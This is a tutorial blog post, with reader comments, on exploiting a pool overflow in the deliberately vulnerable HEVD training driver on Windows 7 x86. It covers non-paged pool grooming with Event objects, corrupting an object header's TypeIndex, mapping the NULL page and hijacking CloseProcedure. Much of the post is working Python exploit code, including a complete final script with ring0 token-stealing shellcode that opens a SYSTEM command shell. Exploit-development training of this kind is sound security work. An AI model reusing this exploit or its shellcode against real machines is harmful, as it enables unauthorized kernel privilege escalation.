Overview
In the previous part we discussed the Write-What-Where vulnerability. This part deals with another vulnerability, Pool Overflow, which in simpler terms is just an out-of-bounds write on a pool buffer. This part can be intimidating, as it goes in depth on how to groom the pool so that we can reliably redirect execution to our shellcode every time. Take your time with it, and try to understand the concepts before actually trying to exploit the vulnerability.
Again, huge thanks to @hacksysteam for the driver.
Pool Feng-Shui
Before we dig deep into Pool Overflow, we need to understand the basics of the pool and how to manipulate it to our needs. A really good read on this topic is available here by Tarjei Mandt. I highly suggest going through it before continuing; you need a solid understanding of the pool concepts for the rest of this post.
The kernel pool is very similar to the Windows heap, as it's used to serve dynamic memory allocations. Just as a heap spray grooms the heap of a normal application, in kernel land we need to groom the pool so that our shellcode is called predictably from a known memory location. It's very important to understand how the pool allocator works, and how to influence its allocation and deallocation mechanisms.
For our HEVD driver, the vulnerable buffer is allocated in the non-paged pool, so we need a technique to groom the non-paged pool. Windows provides the Event object, which is stored in the non-paged pool and can be created using the CreateEvent API:
    HANDLE WINAPI CreateEvent(
      _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,
      _In_     BOOL                  bManualReset,
      _In_     BOOL                  bInitialState,
      _In_opt_ LPCTSTR               lpName
    );
Here, we need to create two large arrays of Event objects with this API, and then create holes in the sprayed region by freeing some of the Event objects in one of the arrays with the CloseHandle API. After coalescing, the adjacent freed chunks combine into larger free chunks:
    BOOL WINAPI CloseHandle(
      _In_ HANDLE hObject
    );
In these free chunks, we need to place our vulnerable buffer so that it reliably overwrites the correct memory location every time, as we'd be "corrupting" the adjacent header of an Event object to divert the flow of execution to our shellcode. A very rough diagram of what we are going to do here should make this a bit clearer (yeah, I'm 1337 in Paint):
After this, we carefully place the pointer to our shellcode so that it gets called through our corrupted header. We'd be faking an OBJECT_TYPE structure, overwriting the pointer to one of the procedures in OBJECT_TYPE_INITIALIZER.
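To make the spray-and-hole idea a little more concrete, here is a toy model in plain Python. It is only a sketch: the real allocator (lookaside lists, page boundaries, other drivers allocating at the same time) is far messier, and the helper names `spray`, `punch_holes` and `free_runs` are made up for illustration. It assumes 0x40-byte Event chunks and a 0x200-byte target chunk, the sizes worked out later in this post.

```python
# Toy model of pool grooming: the pool is a list of fixed-size 0x40 slots.
EVENT_CHUNK = 0x40    # Event object incl. pool header (assumed, see later in the post)
TARGET_CHUNK = 0x200  # 0x1f8-byte vulnerable buffer + 0x8 pool header

def spray(count):
    """Fill `count` consecutive slots with Event chunks."""
    return ["Even"] * count

def punch_holes(slots, run=8, stride=16):
    """Free `run` adjacent slots out of every `stride` (the CloseHandle step)."""
    for start in range(0, len(slots) - run + 1, stride):
        for j in range(run):
            slots[start + j] = None
    return slots

def free_runs(slots):
    """Return (start_slot, size_in_bytes) for every coalesced free run."""
    runs, start = [], None
    for i, tag in enumerate(slots + ["end"]):   # sentinel closes a trailing run
        if tag is None and start is None:
            start = i
        elif tag is not None and start is not None:
            runs.append((start, (i - start) * EVENT_CHUNK))
            start = None
    return runs

slots = punch_holes(spray(64))
holes = free_runs(slots)
```

In this model every hole is exactly `TARGET_CHUNK` bytes and is immediately followed by a live Event chunk, which is the layout the overflow relies on.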
Analysis
To analyze the vulnerability, let’s look into the PoolOverflow.c file:
    __try {
        DbgPrint("[+] Allocating Pool chunk\n");

        // Allocate Pool chunk
        KernelBuffer = ExAllocatePoolWithTag(NonPagedPool,
                                             (SIZE_T)POOL_BUFFER_SIZE,
                                             (ULONG)POOL_TAG);

        if (!KernelBuffer) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE);
            DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer);
        }

        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR));

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE);

    #ifdef SECURE
        // Secure Note: This is secure because the developer is passing a size
        // equal to size of the allocated Pool chunk to RtlCopyMemory()/memcpy().
        // Hence, there will be no overflow
        RtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE);
    #else
        DbgPrint("[+] Triggering Pool Overflow\n");

        // Vulnerability Note: This is a vanilla Pool Based Overflow vulnerability
        // because the developer is passing the user supplied value directly to
        // RtlCopyMemory()/memcpy() without validating if the size is greater or
        // equal to the size of the allocated Pool chunk
        RtlCopyMemory(KernelBuffer, UserBuffer, Size);
This may seem a little more complicated, but we can clearly see the vulnerability here: in the last line, the developer passes the user-supplied Size directly to RtlCopyMemory without validating it against the size of the allocated pool chunk. This leads to a vanilla Pool Overflow vulnerability.
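The difference between the two RtlCopyMemory calls can be mimicked in user-land Python. This is just an illustrative model, not driver code: the "pool" is a bytearray holding the 0x1f8-byte buffer followed by eight placeholder bytes standing in for the neighbouring chunk's header, and the function names are hypothetical.

```python
POOL_BUFFER_SIZE = 0x1f8

def make_pool():
    """0x1f8-byte kernel buffer followed by a stand-in for the next pool header."""
    return bytearray(POOL_BUFFER_SIZE) + bytearray(b"HDR_HDR_")

def copy_vulnerable(pool, user_data):
    # Models RtlCopyMemory(KernelBuffer, UserBuffer, Size):
    # the copy length comes straight from the caller.
    pool[0:len(user_data)] = user_data
    return pool

def copy_secure(pool, user_data):
    # Models the SECURE branch: the copy length is capped at the allocation size.
    data = user_data[:POOL_BUFFER_SIZE]
    pool[0:len(data)] = data
    return pool

payload = b"A" * POOL_BUFFER_SIZE + b"BBBBBBBB"   # 8 bytes too long
overflowed = copy_vulnerable(make_pool(), payload)
safe = copy_secure(make_pool(), payload)
```

In the vulnerable variant the last eight bytes of the payload land on the neighbouring header, while the capped copy leaves it untouched.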
We’ll find the IOCTL for this vulnerability as described in the previous post:
    hex((0x00000022 << 16) | (0x00000000 << 14) | (0x803 << 2) | 0x00000003)
This gives us an IOCTL of 0x22200f.
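The expression above is the CTL_CODE macro from the Windows headers written out by hand. A small helper makes the four fields explicit; the function name `ctl_code` is just illustrative, and the function code 0x803 is the value used in this post.

```python
def ctl_code(device_type, function, method, access):
    """Python equivalent of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method

FILE_DEVICE_UNKNOWN = 0x22   # device type
FILE_ANY_ACCESS = 0x0        # required access
METHOD_NEITHER = 0x3         # buffering method

ioctl = ctl_code(FILE_DEVICE_UNKNOWN, 0x803, METHOD_NEITHER, FILE_ANY_ACCESS)
```

METHOD_NEITHER matters here: the driver receives the raw user-mode pointer, which is why the code calls ProbeForRead on UserBuffer.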
We’ll just analyze the function TriggerPoolOverflow in IDA to see what we can find:
We see "Hack" as the tag of our vulnerable buffer, which has a length of 0x1f8 (504). As we now have sufficient information about the vulnerability, let's jump to the fun part: exploiting it.
Exploitation
Let’s start with our skeleton script, with the IOCTL of 0x22200f.
    import ctypes, sys, struct
    from ctypes import *
    from subprocess import *

    def main():
        kernel32 = windll.kernel32
        psapi = windll.Psapi
        ntdll = windll.ntdll
        # Open a handle to the HEVD device (GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING)
        hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

        if not hevDevice or hevDevice == -1:
            print "*** Couldn't get Device Driver handle"
            sys.exit(-1)

        buf = "A"*100
        bufLength = len(buf)

        # Send the buffer to the Pool Overflow IOCTL
        kernel32.DeviceIoControl(hevDevice, 0x22200f, buf, bufLength, None, 0, byref(c_ulong()), None)

    if __name__ == "__main__":
        main()
We are triggering the Pool Overflow IOCTL. We can see the tag ‘kcaH’ and the size of 0x1f8 (504). Let’s try giving 0x1f8 as the UserBuffer Size.
Cool, we shouldn’t be corrupting any adjacent memory right now, as we are just at the border of the given size. Let’s analyze the pool:
We see that our user buffer is perfectly allocated, and just ends adjacent to the next pool chunk’s header:
Overflowing this would be disastrous, and would result in a BSOD/Crash, corrupting the adjacent pool header.
One interesting thing to note here is that our overflow lets us control the adjacent header. This is what we'd be exploiting, by grooming the pool in a predictable manner to derandomise it. For this, the previously discussed CreateEvent API is perfect: each Event object takes up 0x40 bytes of pool, so eight of them add up exactly to our 0x200 chunk (the 0x1f8 buffer plus its 0x8 pool header).
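The size matching is simple arithmetic, spelled out below with the numbers from this post (the constant names are only labels for this sketch):

```python
POOL_HEADER_SIZE = 0x8     # pool header in front of every chunk (x86)
USER_BUFFER_SIZE = 0x1f8   # POOL_BUFFER_SIZE seen in IDA
EVENT_CHUNK_SIZE = 0x40    # 0x38 for the Event object + 0x8 pool header

hack_chunk_size = USER_BUFFER_SIZE + POOL_HEADER_SIZE
events_per_hole, remainder = divmod(hack_chunk_size, EVENT_CHUNK_SIZE)
```

Since the remainder is zero, freeing eight adjacent Event objects leaves a hole that the "Hack" chunk fills exactly, with another Event object sitting right behind it.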
We’ll spray a huge number of Event objects, store their handles in arrays, and see how it affects our pool:
    import ctypes, sys, struct
    from ctypes import *
    from subprocess import *

    def main():
        kernel32 = windll.kernel32
        ntdll = windll.ntdll
        hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

        if not hevDevice or hevDevice == -1:
            print "*** Couldn't get Device Driver handle."
            sys.exit(-1)

        buf = "A"*504
        # On 32-bit CPython 2 the string data starts 20 bytes into the str object
        buf_ad = id(buf) + 20

        # Two separate lists (chained assignment would alias a single list)
        spray_event1, spray_event2 = [], []

        for i in xrange(10000):
            spray_event1.append(kernel32.CreateEventA(None, False, False, None))
        for i in xrange(5000):
            spray_event2.append(kernel32.CreateEventA(None, False, False, None))

        kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)

    if __name__ == "__main__":
        main()
Our Event objects are sprayed in the non-paged pool. Now we need to create holes, and get our vulnerable buffer (tag Hack) allocated into one of them. After that, we need to "corrupt" the adjacent pool header in such a way that it leads to our shellcode. The size of each Event chunk is 0x40 (0x38 + 0x8), including the pool header.
Let’s analyze the headers:
As we are reliably spraying the non-paged pool with Event objects, it might seem that we could just append these header values to the end of our vulnerable buffer and be done with it. That won't work, though, as these headers have a deeper meaning and need a minute modification. Let's dig deeper into the headers to see what needs to be modified:
The field we are interested in is TypeIndex, which is actually an index (0xc here) into an array of pointers, each of which points to the OBJECT_TYPE of an object type supported by Windows. Let's analyze that:
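As a rough aid, the ten DWORDs that the scripts in this post append after the 504 "A"s can be packed and decoded in Python. The sketch assumes the Windows 7 x86 layouts as I understand them (a _POOL_HEADER with 9-bit PreviousSize, 7-bit PoolIndex, 9-bit BlockSize and 7-bit PoolType, followed by _OBJECT_HEADER_QUOTA_INFO and the start of _OBJECT_HEADER); the field annotations and helper names are my reading, not something the driver source states.

```python
import struct

def decode_pool_header(dword):
    """Split the first header DWORD into the x86 _POOL_HEADER bitfields."""
    low, high = dword & 0xFFFF, dword >> 16
    return {
        "PreviousSize": low & 0x1FF,   # in 8-byte units
        "PoolIndex": low >> 9,
        "BlockSize": high & 0x1FF,     # in 8-byte units
        "PoolType": high >> 9,
    }

def event_headers(type_index):
    """Pack the 0x28 header bytes that sit in front of an Event object body."""
    dwords = [
        0x04080040,                 # _POOL_HEADER bitfields
        0xEE657645,                 # pool tag: "Eve" + ('n' | 0x80)
        0x00000000, 0x00000040,     # _OBJECT_HEADER_QUOTA_INFO
        0x00000000, 0x00000000,
        0x00000001, 0x00000001,     # _OBJECT_HEADER: PointerCount, HandleCount
        0x00000000,                 # Lock
        0x00080000 | type_index,    # low byte of this DWORD is TypeIndex
    ]
    return struct.pack("<10L", *dwords)

fields = decode_pool_header(0x04080040)
original = event_headers(0xc)    # what a sprayed Event object really has
corrupted = event_headers(0x0)   # what the overflow writes instead
```

Decoded this way, PreviousSize is 0x40 units (0x200 bytes, our Hack chunk) and BlockSize is 0x8 units (0x40 bytes, the Event chunk), and the two byte strings differ in a single byte at offset 0x24.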
This all might seem a little complicated at first, but I have highlighted the important parts:
- The first pointer is 00000000, which is very important as we are on Windows 7 (explained below).
- The next highlighted pointer is 85f05418, which is at index 0xc from the start.
- Analyzing this, we see that this is the Event object type.
- Now, the most interesting thing here is the TypeInfo member, at an offset of 0x28.
- Towards the end of this member there are several procedure pointers, and any suitable one can be used. I'd be using CloseProcedure, located at offset 0x38.
- The offset of CloseProcedure from the start of OBJECT_TYPE becomes 0x28 + 0x38 = 0x60.
- This 0x60 is where we'd write the pointer to our shellcode. Triggering the CloseProcedure then ultimately executes our shellcode.
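The lookup described in the list above can be modeled with a small dictionary. This is only a toy stand-in for the kernel's type table: it contains just the two entries mentioned in this post, the pointer value 0x85f05418 comes from the author's debugging session and will differ on other machines, and the function name is hypothetical.

```python
TYPE_INFO_OFFSET = 0x28         # OBJECT_TYPE.TypeInfo
CLOSE_PROCEDURE_OFFSET = 0x38   # CloseProcedure inside OBJECT_TYPE_INITIALIZER

close_procedure_offset = TYPE_INFO_OFFSET + CLOSE_PROCEDURE_OFFSET

# TypeIndex -> address of the OBJECT_TYPE structure (toy table, two entries only)
type_table = {0x0: 0x00000000, 0xc: 0x85f05418}

def close_procedure_slot(type_index):
    """Address from which the CloseProcedure pointer would be read."""
    return type_table[type_index] + close_procedure_offset

legit_slot = close_procedure_slot(0xc)   # inside kernel memory
fake_slot = close_procedure_slot(0x0)    # inside the NULL page
```

With TypeIndex 0xc the pointer is read from kernel memory, but with TypeIndex 0x0 it is read from address 0x60, which user mode can control once the NULL page is mapped.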
Our goal is to change the TypeIndex from 0xc to 0x0, as the first pointer in the table is the null pointer, and in Windows 7 there's a **flaw** where it's possible to map the NULL page using the NtAllocateVirtualMemory call:
    NTSTATUS ZwAllocateVirtualMemory(
      _In_    HANDLE    ProcessHandle,
      _Inout_ PVOID     *BaseAddress,
      _In_    ULONG_PTR ZeroBits,
      _Inout_ PSIZE_T   RegionSize,
      _In_    ULONG     AllocationType,
      _In_    ULONG     Protect
    );
We then write the pointer to our shellcode to the desired location (0x60) using the WriteProcessMemory call:
    BOOL WINAPI WriteProcessMemory(
      _In_  HANDLE  hProcess,
      _In_  LPVOID  lpBaseAddress,
      _In_  LPCVOID lpBuffer,
      _In_  SIZE_T  nSize,
      _Out_ SIZE_T  *lpNumberOfBytesWritten
    );
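What ends up in the NULL page is tiny: zeros everywhere except a 4-byte pointer at 0x60. The sketch below builds that layout in an ordinary bytearray so it can be inspected without touching real memory. The 0x100 size matches the RegionSize the scripts in this post request, the pointer value is a placeholder, and `build_fake_object_type` is a made-up name.

```python
import struct

NULL_PAGE_SIZE = 0x100        # RegionSize requested by the scripts in this post
CLOSE_PROCEDURE_SLOT = 0x60   # 0x28 (TypeInfo) + 0x38 (CloseProcedure)

def build_fake_object_type(shellcode_ptr):
    """Return the bytes the NULL page should hold: zeros plus one pointer."""
    page = bytearray(NULL_PAGE_SIZE)
    struct.pack_into("<L", page, CLOSE_PROCEDURE_SLOT, shellcode_ptr)
    return page

page = build_fake_object_type(0x41414141)  # placeholder, not a real address
```

In the actual exploit the same four bytes are written by WriteProcessMemory at address 0x60 of the current process.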
Putting everything discussed above together, our rough script looks like this:
    import ctypes, sys, struct
    from ctypes import *
    from subprocess import *

    def main():
        kernel32 = windll.kernel32
        ntdll = windll.ntdll
        hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

        if not hevDevice or hevDevice == -1:
            print "*** Couldn't get Device Driver handle."
            sys.exit(-1)

        # Map the NULL page (base address 0x1 is rounded down to 0x0)
        ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40)

        shellcode = "\x90" * 8
        shellcode_address = id(shellcode) + 20

        # Place the shellcode pointer where CloseProcedure will be read from
        kernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(shellcode_address)), 0x4, byref(c_ulong()))

        # 504 bytes of padding, then the adjacent Event headers with TypeIndex set to 0
        buf = "A" * 504
        buf += struct.pack("L", 0x04080040)
        buf += struct.pack("L", 0xEE657645)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000040)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000001)
        buf += struct.pack("L", 0x00000001)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00080000)

        buf_ad = id(buf) + 20

        # Two separate lists (chained assignment would alias a single list)
        spray_event1, spray_event2 = [], []

        for i in xrange(10000):
            spray_event1.append(kernel32.CreateEventA(None, False, False, None))
        for i in xrange(5000):
            spray_event2.append(kernel32.CreateEventA(None, False, False, None))

        # Free 8 adjacent Event objects out of every 16 to create 0x200 holes
        for i in xrange(0, len(spray_event2), 16):
            for j in xrange(0, 8, 1):
                kernel32.CloseHandle(spray_event2[i+j])

        kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)

    if __name__ == "__main__":
        main()
Now, we just need to trigger the CloseProcedure and load our shellcode into memory allocated with VirtualAlloc, and our shellcode should run perfectly fine. The script below is the final exploit:
    import ctypes, sys, struct
    from ctypes import *
    from subprocess import *

    def main():
        kernel32 = windll.kernel32
        ntdll = windll.ntdll
        hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

        if not hevDevice or hevDevice == -1:
            print "*** Couldn't get Device Driver handle."
            sys.exit(-1)

        #Defining the ring0 shellcode and loading it in VirtualAlloc.
        shellcode = bytearray(
            "\x90\x90\x90\x90"              # NOP Sled
            "\x60"                          # pushad
            "\x64\xA1\x24\x01\x00\x00"      # mov eax, fs:[KTHREAD_OFFSET]
            "\x8B\x40\x50"                  # mov eax, [eax + EPROCESS_OFFSET]
            "\x89\xC1"                      # mov ecx, eax (Current _EPROCESS structure)
            "\x8B\x98\xF8\x00\x00\x00"      # mov ebx, [eax + TOKEN_OFFSET]
            "\xBA\x04\x00\x00\x00"          # mov edx, 4 (SYSTEM PID)
            "\x8B\x80\xB8\x00\x00\x00"      # mov eax, [eax + FLINK_OFFSET]
            "\x2D\xB8\x00\x00\x00"          # sub eax, FLINK_OFFSET
            "\x39\x90\xB4\x00\x00\x00"      # cmp [eax + PID_OFFSET], edx
            "\x75\xED"                      # jnz
            "\x8B\x90\xF8\x00\x00\x00"      # mov edx, [eax + TOKEN_OFFSET]
            "\x89\x91\xF8\x00\x00\x00"      # mov [ecx + TOKEN_OFFSET], edx
            "\x61"                          # popad
            "\xC2\x10\x00"                  # ret 16
        )

        ptr = kernel32.VirtualAlloc(c_int(0), c_int(len(shellcode)), c_int(0x3000), c_int(0x40))
        buff = (c_char * len(shellcode)).from_buffer(shellcode)
        kernel32.RtlMoveMemory(c_int(ptr), buff, c_int(len(shellcode)))

        print "[+] Pointer for ring0 shellcode: {0}".format(hex(ptr))

        #Allocating the NULL page, Virtual Address Space: 0x0000 - 0x1000.
        #The base address is given as 0x1, which will be rounded down to the page boundary (0x0).
        #We'd be allocating the memory of Size 0x100 (256).

        print "\n[+] Allocating/Mapping NULL page..."

        null_status = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(c_void_p(0x1)), 0, byref(c_ulong(0x100)), 0x3000, 0x40)
        if null_status != 0x0:
            print "\t[-] Failed to allocate NULL page..."
            sys.exit(-1)
        else:
            print "\t[+] NULL Page Allocated"

        #Writing the ring0 pointer into the location in the mapped NULL page, so as to call the CloseProcedure @ 0x60.

        print "\n[+] Writing ring0 pointer {0} in location 0x60...".format(hex(ptr))
        if not kernel32.WriteProcessMemory(0xFFFFFFFF, 0x60, byref(c_void_p(ptr)), 0x4, byref(c_ulong())):
            print "\t[-] Failed to write at 0x60 location"
            sys.exit(-1)

        #Defining the Vulnerable User Buffer.
        #Length 0x1f8 (504), and "corrupting" the adjacent header to point to our NULL page.

        buf = "A" * 504
        buf += struct.pack("L", 0x04080040)
        buf += struct.pack("L", 0xEE657645)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000040)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00000001)
        buf += struct.pack("L", 0x00000001)
        buf += struct.pack("L", 0x00000000)
        buf += struct.pack("L", 0x00080000)

        buf_ad = id(buf) + 20

        #Spraying the Non-Paged Pool with Event Objects. Creating two large enough (10000 and 5000) chunks.
        #Two separate lists are needed; chained assignment would alias a single list.

        spray_event1, spray_event2 = [], []

        print "\n[+] Spraying Non-Paged Pool with Event Objects..."

        for i in xrange(10000):
            spray_event1.append(kernel32.CreateEventA(None, False, False, None))
        print "\t[+] Sprayed 10000 objects."

        for i in xrange(5000):
            spray_event2.append(kernel32.CreateEventA(None, False, False, None))
        print "\t[+] Sprayed 5000 objects."

        #Creating holes in the sprayed region for our Vulnerable User Buffer to fit in.

        print "\n[+] Creating holes in the sprayed region..."

        for i in xrange(0, len(spray_event2), 16):
            for j in xrange(0, 8, 1):
                kernel32.CloseHandle(spray_event2[i+j])

        kernel32.DeviceIoControl(hevDevice, 0x22200f, buf_ad, len(buf), None, 0, byref(c_ulong()), None)

        #Closing the Handles by freeing the Event Objects, ultimately executing our shellcode.

        print "\n[+] Calling the CloseProcedure..."

        for i in xrange(0, len(spray_event1)):
            kernel32.CloseHandle(spray_event1[i])

        for i in xrange(8, len(spray_event2), 16):
            for j in xrange(0, 8, 1):
                kernel32.CloseHandle(spray_event2[i + j])

        print "\n[+] nt authority\\system shell incoming"
        Popen("start cmd", shell=True)

    if __name__ == "__main__":
        main()
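The shellcode in the final script hard-codes several structure offsets. As a reading aid, the same bytes can be rebuilt from named constants. The values are the ones embedded in the shellcode above, the field names in the comments are the usual Windows 7 x86 ones as far as I know, and other Windows builds would need different numbers. The helper `dword` is only for this sketch.

```python
import struct

# Offsets embedded in the token-stealing shellcode (Windows 7 x86 assumed)
KTHREAD_OFFSET = 0x124    # fs:[0x124] -> current thread
EPROCESS_OFFSET = 0x50    # thread -> owning process
PID_OFFSET = 0xB4         # _EPROCESS.UniqueProcessId
FLINK_OFFSET = 0xB8       # _EPROCESS.ActiveProcessLinks.Flink
TOKEN_OFFSET = 0xF8       # _EPROCESS.Token
SYSTEM_PID = 0x4

def dword(value):
    """Little-endian 32-bit immediate/displacement."""
    return struct.pack("<L", value)

shellcode = (
    b"\x90\x90\x90\x90"                                 # NOP sled
    + b"\x60"                                           # pushad
    + b"\x64\xA1" + dword(KTHREAD_OFFSET)               # mov eax, fs:[KTHREAD_OFFSET]
    + b"\x8B\x40" + struct.pack("<B", EPROCESS_OFFSET)  # mov eax, [eax + EPROCESS_OFFSET]
    + b"\x89\xC1"                                       # mov ecx, eax
    + b"\x8B\x98" + dword(TOKEN_OFFSET)                 # mov ebx, [eax + TOKEN_OFFSET]
    + b"\xBA" + dword(SYSTEM_PID)                       # mov edx, 4
    + b"\x8B\x80" + dword(FLINK_OFFSET)                 # mov eax, [eax + FLINK_OFFSET]
    + b"\x2D" + dword(FLINK_OFFSET)                     # sub eax, FLINK_OFFSET
    + b"\x39\x90" + dword(PID_OFFSET)                   # cmp [eax + PID_OFFSET], edx
    + b"\x75\xED"                                       # jnz back to the Flink load
    + b"\x8B\x90" + dword(TOKEN_OFFSET)                 # mov edx, [eax + TOKEN_OFFSET]
    + b"\x89\x91" + dword(TOKEN_OFFSET)                 # mov [ecx + TOKEN_OFFSET], edx
    + b"\x61"                                           # popad
    + b"\xC2\x10\x00"                                   # ret 16
)
```

The jnz displacement 0xED is -19, the combined length of the four loop instructions, so the loop walks the process list until it finds PID 4 and then copies its token into the current process.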
And we get our usual nt authority\system shell:
Hi, I am following your article to understand and write kernel pool overflow exploits in Python. I understand everything up to mapping the NULL page, and changing the value "0xc" to "0x0" even works. After that, dd 0x00000000 shows question marks (?), and I don't understand this part. Can you please help me with this?
Thank you in advance.
Question marks would suggest that the NULL page isn't getting mapped correctly. Are you setting the breakpoint before the program crashes and analyzing it then?
Hello, thanks for your outstanding work. I'm not good at English…
I think I have understood the post:
[+] pool overflow to control the pool header
[+] change 0xc to 0 to fake the Event type (the zero page is under our control, so we can put whatever we want there)
[+] replace the CloseProcedure –> shellcode
[+] pwn
However, your exploit doesn't work on my virtual machine (win7-sp1-x86). I debugged it and found that the "event" spray failed… (after "*Hack", not "Even"). Could you give me some tips…
Thank you very much.